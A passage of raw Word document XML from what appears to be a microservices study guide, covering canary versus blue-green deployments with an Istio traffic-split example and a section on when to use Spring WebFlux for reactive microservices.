      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by creating two versions of your deployment and using labels to route traffic. Traffic can be controlled using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Istio) or Kubernetes itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B299B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06BF2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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2137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86B1B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6FFC4BB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F111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072FD4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108CB5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596E6FE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CC79E7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111772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B9383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753779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6C3A1BE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C4CFD2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0099913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1E65047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2467F02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4275586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2ACE5C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49AC3AA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6F53CE0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D147B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networking.istio.io/v1alpha3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4E2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VirtualService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D57A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00C26FD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A1D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4BEB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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E3B9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myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6122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ttp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5586408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route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A66781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681A36F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50BC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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEB3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90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291F0A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73C9584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0E4BBAE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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4E5B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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B279B6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configuration routes 90% of traffic to the old version (v1) and 10% to the new version (v2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981C8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4F903B">
          <v:rect id="_x0000_i3039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F05AB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52"/>
        <w:gridCol w:w="4534"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="1C170390" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D44060"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB650F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lue-Green Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334C95A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anary Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="35F83AA7" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F06C8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ployment Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="577F456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from old version (Blue) to new version (Green)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4895CD7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rollout to a small subset of users first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="2F1CE6E8" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEEEC2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sk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE5E1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w risk (because of full rollback to Blue)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5417C63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dium risk (issues are identified in early users)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="772BDCAE" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D3167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ffic Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7711B84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all traffic to Green at once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD889D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increase of traffic to new version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="74C3FDEA" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68BE039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back</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9D500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and quick rollback to Blue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1362D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ollback to old version is possible but more complex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="28DA6AF3" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0E7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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DDEB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Critical updates with zero downtime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24E965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Feature testing and performance validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="284E1E72" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E45C7B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st/Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360A9B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duplicate environments (Blue and Green)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5009F0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careful monitoring but no need for duplicate environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA65E9" w:rsidRPr="00FA65E9" w14:paraId="2315DF41" w14:textId="77777777" w:rsidTr="00312742">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F2C9F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e of Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1839E3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 to manage traffic switching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FE5846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monitoring and controlled traffic splitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19228720"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D0818">
          <v:rect id="_x0000_i3040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6872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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9CBE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w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployments are valuable strategies in microservices architectures, and choosing between them depends on your goals and requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47380B8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best for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zero-downtime deployment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xml:space="preserve"> where an easy rollback is necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2006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ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gradually releasing new features</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, gathering </w:t>
      </w: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the performance of a new version before full-scale deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0744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practice, both strategies can be combined in different stages of the deployment pipeline depending on the level of risk tolerance and the complexity of the service being deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA9F93" w14:textId="7D8C16E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3041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="769453EA" w14:textId="6872FF26" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA22DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="724" w:name="_Toc197867938"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When to use WebFlux for reactive microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>
    </w:p>
    <w:p w14:paraId="5180D938" w14:textId="4CCBB1DA"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is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> designed to support building </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It’s especially useful for building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microservices that can scale to handle many concurrent connections efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571A2C8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key scenarios when you should consider using </w:t>
      </w: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for reactive microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A580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F067">
          <v:rect id="_x0000_i3042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D801ED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High Concurrency and Scalability Needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B380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r microservices need to handle a large number of concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 need to manage a large number of concurrent users who are performing read-heavy operations like querying the database for data, WebFlux can be highly efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C91E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E788D8">
          <v:rect id="_x0000_i3043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5CC0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Non-Blocking I/O Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443191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ideal for applications that need to perform I/O operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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microservice is calling other services via HTTP or querying a database with asynchronous drivers (e.g., MongoDB with reactive support), WebFlux is well-suited for such use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B69351"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98FBF">
          <v:rect id="_x0000_i3044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E4A3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Event-Driven Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1036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beneficial for event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If your microservices need to respond to events or stream data, WebFlux makes it easy to handle streams of data efficiently with a non-blocking approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB88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service is designed to react to events from a message broker (e.g., Kafka or RabbitMQ) or to process real-time data streams (e.g., WebSockets or Server-Sent Events), WebFlux is a natural fit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57094A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8C84F4">
          <v:rect id="_x0000_i3045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A76C1C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Lightweight and Low-Latency Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F5C48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 need lightweight microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal latency. WebFlux works well in microservices that are supposed to serve low-latency requests, especially when dealing with APIs that need to scale efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780DD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Real-time chat applications, online gaming services, or live updates where responsiveness and low-latency is a priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B051B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55411">
          <v:rect id="_x0000_i3046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="683CD18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Microservices with Reactive Backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FB4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microservice interacts with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive backend</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB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Cassandra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Redis Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or any other reactive data source), then WebFlux fits naturally because both the backend and the web layer are using non-blocking operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9F8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6D856">
          <v:rect id="_x0000_i3047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985769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6. APIs Requiring Real-Time or Long-Polling Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402375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 WebFlux for applications requiring long-pollin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al-time data streaming</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WebSocket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Server-Sent Events (SSE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. WebFlux makes it easier to create such APIs where a client needs to receive real-time updates from the server without repeatedly polling it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66E44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Push notifications, live feeds (e.g., social media posts), and IoT-based real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550AE52"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60BA6">
          <v:rect id="_x0000_i3048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C458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7. Microservices with Low Resource Usage Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44E9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can be highly efficient in environments where resource consumption needs to be minimal. Since WebFlux uses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xml:space="preserve"> and asynchronous processing, it’s more efficient in terms of memory and CPU usage compared to traditional blocking models like in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAEE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Microservices deployed on resource-constrained environments (e.g., edge devices, or serverless platforms) that need to maximize resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FCD6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199FD2">
          <v:rect id="_x0000_i3049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7CB3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8. Need for Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D202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provides built-in backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a system is overwhelmed by too many requests or events, it can apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent the system from becoming unresponsive by slowing down the rate at which it processes data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28766F9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For high-load applications, such as real-time analytics or systems where you’re processing incoming data from sensors or logs, backpressure ensures that the system doesn't crash under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A32F3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1514D4">
          <v:rect id="_x0000_i3050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="295768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Not to Use WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EA0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imple CRUD Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If your application is a simple </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application with limited scaling requirements and doesn’t have many concurrent connections, you might not need the complexity of reactive programming.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with a traditional thread-per-request model is often sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4EB3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ocking or CPU-Intensive Workloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
